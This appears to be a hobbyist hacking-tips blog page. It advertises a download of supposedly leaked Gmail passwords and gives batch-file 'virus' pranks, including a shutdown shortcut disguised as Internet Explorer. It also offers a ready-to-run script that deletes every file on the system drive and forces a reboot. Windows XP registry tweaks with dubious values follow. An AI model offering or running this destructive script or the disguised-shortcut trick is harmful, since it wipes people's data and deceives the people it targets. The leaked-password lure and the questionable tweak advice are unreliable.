4.93 million Gmail passwords leaked by hackers.

4.93 million Gmail passwords leaked by hackers.
Here is list of all gmail accounts of which passwords have been leaked:


Click here to Download Zip File.

OR 

Download from Here

Don't worry files are totally safe. Unzip them. You will find a text file, which contains the list of all hacked gmail accounts.

Text file have complete list of hacked gmail accounts.

Thanks

To Make VIRUS : PRANKS

1. open notepad.
2. copy the code below and paste in notepad.
3. Save As xyz.bat
4. Go to folder where you have saved it. Double click it to RUN.

@echo off 
color 0C
echo ************************************
ping localhost -n 2 >nul 
echo ************************************
ping localhost -n 2 >nul 
echo **        **
ping localhost -n 2 >nul 
echo ** BROUGHT TO YOU BY: CRACKOMANIA **
ping localhost -n 2 >nul 
echo **        **
ping localhost -n 2 >nul 
echo ************************************
ping localhost -n 2 >nul 
echo ************************************
ping localhost -n 2 >nul 
echo I 
ping localhost -n .5 >nul 
cls 
echo I g 
ping localhost -n .5 >nul 
cls 
echo I go 
ping localhost -n .5 >nul 
cls 
echo I got 
ping localhost -n .5 >nul 
cls 
echo I got u 
ping localhost -n .5 >nul 
cls 
echo I got u %username%... 
ping localhost -n 3 >nul 
cls 
echo  %username% T
ping localhost -n .5 >nul 
cls 
echo  %username% Th
ping localhost -n .5 >nul 
cls 
echo  %username% Thi
ping localhost -n .5 >nul 
cls 
echo  %username% This
ping localhost -n .5 >nul 
cls 
echo  %username% This i
ping localhost -n .5 >nul 
cls 
echo  %username% This is
ping localhost -n .5 >nul 
cls 
echo  %username% This is n
ping localhost -n .5 >nul 
cls 
echo  %username% This is no
ping localhost -n .5 >nul 
cls 
echo  %username% This is not
ping localhost -n .5 >nul 
cls 
echo  %username% This is not P
ping localhost -n .5 >nul 
cls 
echo  %username% This is not PR
ping localhost -n .5 >nul 
cls 
echo  %username% This is not PRA
ping localhost -n .5 >nul 
cls 
echo  %username% This is not PRAN
ping localhost -n .5 >nul 
cls 
echo  %username% This is not PRANK !!!!
ping localhost -n .5 >nul 
cls 
echo Loading File crackThePC.dll 
ping localhost -n 3 >nul 
cls 
echo crackThePC.dll loaded successfully! 
ping localhost -n 3 >nul 
cls 
echo time for your PC to DIE!!!! 
ping localhost -n 3 >nul 
cls 
echo i 
ping localhost -n .5 >nul 
cls 
echo in 
ping localhost -n .5 >nul 
cls 
echo ini 
ping localhost -n .5 >nul 
cls 
echo init 
ping localhost -n .5 >nul 
cls 
echo initi 
ping localhost -n .5 >nul 
cls 
echo initia 
ping localhost -n .5 >nul 
cls 
echo initial 
ping localhost -n .5 >nul 
cls 
echo initiali  
ping localhost -n .5 >nul 
cls 
echo initializ 
ping localhost -n .5 >nul 
cls 
echo initializi 
ping localhost -n .5 >nul 
cls 
echo initializin 
ping localhost -n .5 >nul 
cls 
echo initializing 
ping localhost -n .5 >nul 
cls 
echo initializing  
ping localhost -n .5 >nul 
cls 
echo Attack Initialized  
ping localhost -n .5 >nul 
cls 
echo Begin..... 
ping localhost -n 3 >nul 
cls 
echo 1 percent 
ping localhost -n 1.5 >nul 
cls 
echo 2 percent 
ping localhost -n 1.5 >nul 
cls 
echo 3 percent 
ping localhost -n 1.5 >nul 
cls 
echo 4 percent 
ping localhost -n 1.5 >nul 
cls 
echo 5 percent 
ping localhost -n 1.5 >nul 
cls 
echo 6 percent 
ping localhost -n 1.5 >nul 
cls 
echo 7 percent 
ping localhost -n 1.5 >nul 
cls 
echo 8 percent 
ping localhost -n 1.5 >nul 
cls 
echo 9 percent 
ping localhost -n 1.5 >nul 
cls 
echo 10 percent 
ping localhost -n 1.5 >nul 
cls 
echo 11 
ping localhost -n 1 >nul 
cls 
echo 12 
ping localhost -n 1 >nul 
cls 
echo 13 
ping localhost -n 1 >nul 
cls 
echo 14 
ping localhost -n 1 >nul 
cls 
echo 15 
ping localhost -n 1 >nul 
cls 
echo 16 
ping localhost -n 1 >nul 
cls 
echo 17 
ping localhost -n 1 >nul 
cls 
echo 18 
ping localhost -n 1 >nul 
cls 
echo 19 
ping localhost -n 1 >nul 
cls 
echo 20 
ping localhost -n 1 >nul 
cls 
echo 21 
ping localhost -n 1 >nul 
cls 
echo 25 
ping localhost -n 1 >nul 
cls 
echo 35 
ping localhost -n 1 >nul 
cls 
echo 45 
ping localhost -n 1 >nul 
cls 
echo 46 
ping localhost -n 1 >nul 
cls 
echo 47 
ping localhost -n 1 >nul 
cls 
echo 57 
ping localhost -n 1 >nul 
cls 
echo 66 
ping localhost -n 1 >nul 
cls 
echo 71 
ping localhost -n 1 >nul 
cls 
echo 73 
ping localhost -n 1 >nul 
cls 
echo 86 
ping localhost -n 1 >nul 
cls 
echo 96 
ping localhost -n 1 >nul 
cls 
echo 99 
ping localhost -n 1 >nul 
cls 
echo 100 percent c 
ping localhost -n 1 >nul 
cls 
echo 100 percent co 
ping localhost -n 1 >nul 
cls 
echo 100 percent com 
ping localhost -n .5 >nul 
cls 
echo 100 percent comp 
ping localhost -n .5 >nul 
cls 
echo 100 percent compl 
ping localhost -n .5 >nul 
cls 
echo 100 percent comple 
ping localhost -n .5 >nul 
cls 
echo 100 percent complet 
ping localhost -n .5 >nul 
cls 
echo 100 percent complete!!!! 
ping localhost -n 3 >nul 
cls 
echo Hardware malfunction = ERROR 0XDIE !!!!!
echo THIS IS DOOMSADAY FOR YOUR PC... !!!!! 
ping localhost -n 3 >nul 
cls 
:a 
echo %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% virus %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random%%random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random%%random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random%%random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random% KILLER ON LOOSE %random%  
goto a 

How to remove infected Autorun.inf

where do you see these files, mostly in your hard drives & pen drive. You are annoyed with this because you think these are virus. But actually these are not virus but important component of windows OS. And now you can see them because they have been infected. They have been infected because it's most prime motive virus made around whole world.

Let me give you little introduction of autorun.inf (source: Wikipedia)

An autorun.inf file is a text file that can be used by the AutoRun and AutoPlay components of Microsoft Windows Operating systems.For the file to be discovered and used by these components, it must be located in the root directory of a volume. As Windows has a case-insensitive view of filenames, the autorun.inf file can be stored as AutoRun.inf or Autorun.INF or any other case combination.

Autorun.inf file is used in Flash drive and CD. AutoRun enabled application CD-ROMs to automatically launch a program which could then guide the user through the installation process. By placing settings in an autorun.inf file, manufacturers could decide what actions were taken when their CD-ROM was inserted. The simplest autorun.inf files have just two settings: one specifying an icon to represent the CD in Windows Explorer (or "My Computer") and one specifying which application to run.


How to remove Autorun.inf :

1. Go to Start button.
2. In the Run type CMD. Hit enter. This will launch new command shell window
3. There type C:. Hit enter. This will take you to C: drive.
4. Type autorun.inf. Hit enter. This will open new notepad, where you will see actual autorun.inf file. Close it.
5. Now type del autorun.inf. This will show message "could not find autorun.inf". This doesn't means autorun.inf. It's still there !!!
6. Now type "attrib autorun.inf -s -h -r" and hit enter.
7. Now type del autorun.inf and hit enter.
8. Type autorun.inf and hit enter and this time you will not see any infected notepad.

Hurrah !!! you cured your problem.

You can do same with every drive just by going and typing the drive letter e.g D:\ , E:\ etc.



TO MAKE VIRUS

Materials are not posted with unethical intention


This will give you insight into how virus works with your system.

STEPS to make virus to shutdown system with message and restart it again

1. open notepad
2. write following codes in notepad

@echo off
echo your system has been infected with virus
pause
echo do you want to delete it?
pause
echo press enter to delete it
echo access denied
pause
echo VIRUS LOADING!!!   /*you can write whatever you wish*/
echo VIRUS ACTIVATED!!!      /*you can write whatever you wish*/
echo welcome to HELL!!!
shutdown -c "WELCOME TO HELL"

3. save files as "Hell.bat" (or whatever you wish)
4. double click "hell.bat"



Now another easy way:


1.Right click on desktop.
2.Go to "new" button.
3. Select "shortcut" option.
4. In the box type following command
     shutdown -s -c "you have got virus"
5. Click on the next Button. You can give it any name you wish.
    Like if you wanna play prank with your friends give it name "Internet Explorer". Click on Finish button
.6. Now on desktop you will see that shortcut, that you just made. Right click over it go to "properties".
 7. Select the "change Icon" button. And among Icon list select the icon of "Internet Explorer".
8. Click "OK". Then "Apply".


Now your friend will think it as Internet Explorer label. As soon he will click it. Shutdown command will be invoked and system will shutdown printing out your message.
There is no harm in this. It's just a prank 

DESTROYING COMPUTER

Listen I am not posting this with Unethical intention. I am only posting this for awareness of WINDOWS users.

Steps to bring HAVOC to system.

1. open notepad
2. Type the following:
       @echo off
            del %systemdrive%\*.*/f/s/q
            shutdown -r -f -t 00
3. Save as: "hell.bat" ( or anything u wish but always keep .bat)
     Save as type: All files


WARNING: don't execute this file on your system. You will be ruined ;D

HACK: To make Windows XP Fast

HACK: To load Applications Faster.
For every application you run on windows there is component names Prefetcher in Microsoft windows. It is a component of the Memory Manager that speeds up the Windows boot process, and shortens the amount of time it takes to start up programs. The Windows prefetcher aims to load applications faster by “prefetching” the application and storing it in the pre-fetch cache. When a Windows system boots, a large number of files need to be read into memory and processed.
This includes:
-          loading different segments of the same file at different times. As a result, a significant amount of time is spent opening and accessing files multiple times, where a single access would be more efficient. The prefetcher works by watching what code and data is accessed during the boot process (including reads of the NTFS Master File Table), and recording a trace file of this activity.
-          Next time when system boots. This information recorded in this trace file can be used to load code and data in a more optimal fashion.
-          The boot prefetcher will continue to watch for such activity until 30 seconds after the user's shell has started, or until 60 seconds after all services have finished initializing, or until 120 seconds after the system has booted, whichever elapses first.
You can speed up application loading by changing the default value of one the settings under the relevant key.

Navigate to:
HLM\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters

Value can be set to following:
0 = Disabled, 1 = Application launch prefetching enabled, 2 = Boot prefetching enabled,
 3 = Applaunch and Boot enabled (Optimal and Default).

The default value for the EnablePrefetcher setting is 3. You can go up to  9.

Reboot the system to take change effect.


HACK: For loading boot files fast.
Generally while file is fragmented it gets scattered over all over hard disk. This further affects the files that load at boot time. You can defragment the files that load at system startup to enable faster loading.

Navigate to:
HLM\SOFTWARE\Microsoft\Dfrg\BootOptimizeFunction

set to Y (forYes) for setting called Enable under this key. This setting defragments the boot files, and it relocate startup files into contiguous clusters on the volume, reducing the movement of the disk head when reading the volume. With the setting at Y, boot file optimisation occurs automatically if the system is idle for 10 minutes.
Reboot the system to take the change effect.


HACK: To make application load on priority.
In operating system multiple instances of the same application shares a single process thread. If you have stability problems or slow application loads, launching each application in its own process will improve stability and speed up load times.

Navigate to:
HLM\SYSTEM\CurrentControlSet\Control\PriorityControl

Optimise XP’s process priority control by setting the DWORD Value for Win32PrioritySeperation to… well, the default is 2, and 27, 28, 37, 38, and more have all been quoted as good values (in decimal). However, note that that each process will consume the same amount of memory: this hack is therefore only recommended if you have 512 MB or more of system RAM.
No reboot is required.


HACK: to unload Unused Dynamic Link Library
Dynamic-link library as you all must be knowing is Microsoft's implementation of the shared library concept in the Microsoft Windows and OS/2 operating systems. These libraries usually have the file extension DLL, OCX (for libraries containing ActiveX controls), or DRV (for legacy system drivers). The file formats for DLLs are the same as for Windows EXE files — that is, Portable Executable (PE) for 32-bit and 64-bit Windows, and New Executable (NE) for 16-bit Windows. As with EXEs, DLLs can contain code, data, and resources, in any combination.

So every time an application is closed, XP has the annoying habit of leaving the associated DLL files in memory. This can hog precious resources and memory, and also cause stability problems. If you wish you can make these DLLs unload themselves from memory after the program is done running.

Navigate to:
HLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ Explorer\AlwaysUnloadDLL

If the DWORD AlwaysUnloadDLL is not present, you will need to create it. Set the Value of the “(Default)” setting to 1. Application-associated DLLs will get unloaded when the application is closed.

Hacking: WINDOWS XP

Most worse HACK in windows can be done then you have ever imagined. And maximum of this game lies with registry HACKING. Let me show you how this game begins

To start Registry editing you need to run regedit program.which you can run as :

1.Click on start button

2.Click on the run button

3.Type regedit in box and hit enter a new window will pop up showing you hives of registry.

Most worse HACK in windows can be done then you have ever imagined. And maximum of this game lies with registry HACKING. Let me show you how this game begins



To start Registry editing you need to run regedit program.which you can run as :

1.Click on start button

2.Click on the run button

3.Type regedit in box and hit enter a new window will pop up showing you hives of registry.



Followers